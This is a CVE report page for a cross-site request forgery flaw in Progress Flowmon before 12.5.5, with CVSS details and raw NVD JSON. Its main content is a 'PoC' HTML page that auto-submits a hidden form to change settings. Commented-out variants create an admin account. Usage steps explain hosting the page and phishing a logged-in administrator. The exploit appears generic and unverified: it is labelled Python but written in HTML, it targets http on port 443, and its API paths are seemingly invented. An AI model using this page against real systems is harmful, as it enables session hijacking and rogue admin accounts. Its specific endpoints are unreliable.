Security Vulnerability Report
中文
CVE-2025-10240 CVSS 8.8 HIGH

CVE-2025-10240

Published: 2025-10-09 13:15:32
Last Modified: 2026-04-15 00:35:42

Description

A vulnerability exists in the Progress Flowmon web application prior to version 12.5.5, whereby a user who clicks a malicious link provided by an attacker may inadvertently trigger unintended actions within their authenticated session.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Progress Flowmon < 12.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10240 - Progress Flowmon CSRF PoC # This PoC demonstrates how an attacker can craft a malicious HTML page # that triggers unintended actions when a logged-in Flowmon admin visits it. <!DOCTYPE html> <html> <head> <title>Loading...</title> </head> <body> <h1>Please wait while we process your request...</h1> <!-- Method 1: Auto-submitting hidden form (POST-based CSRF) --> <form id="csrf-form" action="http://target-flowmon:443/api/v1/config" method="POST" style="display:none;"> <input type="hidden" name="action" value="modify" /> <input type="hidden" name="setting" value="alert_threshold" /> <input type="hidden" name="value" value="0" /> <input type="submit" value="Submit" /> </form> <script> // Auto-submit the form when the page loads document.getElementById('csrf-form').submit(); </script> <!-- Method 2: Image-based GET CSRF (simpler approach) --> <!-- <img src="http://target-flowmon:443/api/v1/admin/users/create?username=attacker&password=pwned&role=admin" style="display:none;" /> --> <!-- Method 3: Fetch-based CSRF (modern browsers) --> <!-- <script> fetch('http://target-flowmon:443/api/v1/config', { method: 'POST', credentials: 'include', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({ action: 'modify', setting: 'alert_threshold', value: 0 }) }); </script> --> </body> </html> # Usage: # 1. Host this HTML on an attacker-controlled server # 2. Send the link to a logged-in Flowmon administrator via phishing # 3. When admin clicks the link, the malicious request executes with their session

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10240", "sourceIdentifier": "[email protected]", "published": "2025-10-09T13:15:31.950", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability exists in the Progress Flowmon web application prior to version 12.5.5, whereby a user who clicks a malicious link provided by an attacker may inadvertently trigger unintended actions within their authenticated session."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://community.progress.com/s/article/Can-CVE-2025-10240-affect-Progress-Flowmon-appliance", "source": "[email protected]"}]}}